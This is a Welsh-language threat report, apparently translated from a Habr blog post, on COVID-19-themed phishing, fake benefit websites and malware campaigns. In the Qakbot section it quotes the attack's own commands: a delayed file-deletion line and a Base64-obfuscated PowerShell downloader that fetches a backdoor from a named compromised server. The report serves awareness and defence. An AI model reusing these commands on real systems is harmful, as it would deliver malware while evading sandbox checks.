Mae ymosodwyr yn parhau i ecsbloetio pwnc COVID-19, gan greu mwy a mwy o fygythiadau i ddefnyddwyr sydd â diddordeb mawr ym mhopeth sy'n gysylltiedig â'r epidemig. YN Rydym eisoes wedi siarad am ba fathau o malware a ymddangosodd yn sgil y coronafirws, a heddiw byddwn yn siarad am dechnegau peirianneg gymdeithasol y mae defnyddwyr mewn gwahanol wledydd, gan gynnwys Rwsia, eisoes wedi dod ar eu traws. Mae tueddiadau ac enghreifftiau cyffredinol o dan y toriad.
Cofiwch yn Buom yn siarad am y ffaith bod pobl yn barod i ddarllen nid yn unig am y coronafirws a chwrs yr epidemig, ond hefyd am fesurau cymorth ariannol? Dyma enghraifft dda. Darganfuwyd ymosodiad gwe-rwydo diddorol yn nhalaith Almaenig Gogledd Rhine-Westphalia neu CNC. Creodd yr ymosodwyr gopïau o wefan y Weinyddiaeth Economi (), lle gall unrhyw un wneud cais am gymorth ariannol. Mae rhaglen o'r fath yn bodoli mewn gwirionedd, a bu'n fuddiol i sgamwyr. Ar ôl derbyn data personol eu dioddefwyr, fe wnaethant gais ar wefan y weinidogaeth go iawn, ond nododd fanylion banc eraill. Yn ôl data swyddogol, gwnaed 4 mil o geisiadau ffug o'r fath hyd nes y darganfuwyd y cynllun. O ganlyniad, syrthiodd $109 miliwn a fwriadwyd ar gyfer dinasyddion yr effeithiwyd arnynt i ddwylo twyllwyr.
Hoffech chi gael prawf am ddim ar gyfer COVID-19?
Enghraifft arwyddocaol arall o we-rwydo ar thema coronafirws oedd mewn e-byst. Denodd y negeseuon sylw defnyddwyr gyda chynnig i gael profion am ddim am haint coronafirws. Yn yr atodiad o'r rhain cafwyd enghreifftiau o Trickbot/Qakbot/Qbot. A phan ddechreuodd y rhai oedd am wirio eu hiechyd “lenwi'r ffurflen atodedig,” lawrlwythwyd sgript faleisus i'r cyfrifiadur. Ac er mwyn osgoi profion bocsio tywod, dim ond ar ôl peth amser y dechreuodd y sgript lawrlwytho'r prif firws, pan oedd y systemau amddiffyn yn argyhoeddedig na fyddai unrhyw weithgaredd maleisus yn digwydd.
Roedd hefyd yn hawdd argyhoeddi'r rhan fwyaf o ddefnyddwyr i alluogi macros. I wneud hyn, defnyddiwyd tric safonol: i lenwi'r holiadur, yn gyntaf mae angen i chi alluogi macros, sy'n golygu bod angen i chi redeg sgript VBA.
Fel y gallwch weld, mae'r sgript VBA wedi'i guddio'n arbennig rhag gwrthfeirysau.
Mae gan Windows nodwedd aros lle mae'r cais yn aros /T <eiliadau> cyn derbyn yr ateb “Ie” rhagosodedig. Yn ein hachos ni, arhosodd y sgript 65 eiliad cyn dileu ffeiliau dros dro:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Ac wrth aros, cafodd malware ei lawrlwytho. Lansiwyd sgript PowerShell arbennig ar gyfer hyn:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Ar ôl datgodio gwerth Base64, mae'r sgript PowerShell yn lawrlwytho'r drws cefn sydd wedi'i leoli ar y gweinydd gwe a hacio'n flaenorol o'r Almaen:
http://automatischer-staubsauger.com/feature/777777.pngac yn ei arbed dan yr enw:
C:UsersPublictmpdirfile1.exe
Ffolder ‘C:UsersPublictmpdir’ yn cael ei ddileu wrth redeg y ffeil 'tmps1.bat' sy'n cynnwys y gorchymyn cmd /c mkdir ""C:UsersPublictmpdir"".
Ymosodiad wedi'i dargedu ar asiantaethau'r llywodraeth
Yn ogystal, adroddodd dadansoddwyr FireEye yn ddiweddar ymosodiad APT32 wedi'i dargedu wedi'i anelu at strwythurau'r llywodraeth yn Wuhan, yn ogystal â Gweinyddiaeth Rheoli Argyfyngau Tsieineaidd. Roedd un o'r RTFs a ddosbarthwyd yn cynnwys dolen i erthygl yn y New York Times o'r enw . Fodd bynnag, ar ôl ei ddarllen, lawrlwythwyd meddalwedd maleisus (nododd dadansoddwyr FireEye yr enghraifft fel METALJACK).
Yn ddiddorol, ar adeg eu canfod, nid oedd yr un o'r gwrthfeirysau wedi canfod yr achos hwn, yn ôl Virustotal.
Pan fydd gwefannau swyddogol i lawr
Digwyddodd yr enghraifft fwyaf trawiadol o ymosodiad gwe-rwydo yn Rwsia y diwrnod o'r blaen. Y rheswm am hyn oedd penodi budd-dal hir-ddisgwyliedig i blant 3 i 16 oed. Pan gyhoeddwyd dechrau derbyn ceisiadau ar Fai 12, 2020, rhuthrodd miliynau i wefan Gwasanaethau’r Wladwriaeth am gymorth hir-ddisgwyliedig a dod â’r porth i lawr heb fod yn waeth nag ymosodiad DDoS proffesiynol. Pan ddywedodd yr arlywydd “na allai Gwasanaethau’r Llywodraeth ymdopi â’r llif o geisiadau,” dechreuodd pobl siarad ar-lein am lansio gwefan amgen ar gyfer derbyn ceisiadau.
Y broblem yw bod sawl safle wedi dechrau gweithio ar unwaith, ac er bod un, yr un go iawn yn posobie16.gosuslugi.ru, mewn gwirionedd yn derbyn ceisiadau, mwy .
Daeth cydweithwyr o SearchInform o hyd i tua 30 o barthau twyllodrus newydd yn y parth .ru. Mae Infosecurity a Softline Company wedi olrhain mwy na 70 o wefannau gwasanaeth ffug tebyg gan y llywodraeth ers dechrau mis Ebrill. Mae eu crewyr yn trin symbolau cyfarwydd a hefyd yn defnyddio cyfuniadau o'r geiriau gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, ac ati.
Hype a pheirianneg gymdeithasol
Mae'r holl enghreifftiau hyn ond yn cadarnhau bod ymosodwyr yn llwyddo i roi gwerth ariannol ar bwnc coronafirws. A pho uchaf yw'r tensiwn cymdeithasol a'r materion mwy aneglur, y mwyaf o siawns sydd gan sgamwyr i ddwyn data pwysig, gorfodi pobl i roi'r gorau i'w harian ar eu pen eu hunain, neu hacio mwy o gyfrifiaduron.
Ac o ystyried bod y pandemig wedi gorfodi pobl a allai fod yn barod i weithio gartref yn llu, nid yn unig mae data personol, ond hefyd data corfforaethol mewn perygl. Er enghraifft, yn ddiweddar bu defnyddwyr Microsoft 365 (Office 365 yn flaenorol) hefyd yn destun ymosodiad gwe-rwydo. Derbyniodd pobl negeseuon llais enfawr “a gollwyd” fel atodiadau i lythyrau. Fodd bynnag, roedd y ffeiliau mewn gwirionedd yn dudalen HTML a anfonodd ddioddefwyr yr ymosodiad ati . O ganlyniad, colli mynediad a chyfaddawdu'r holl ddata o'r cyfrif.
Ffynhonnell: hab.com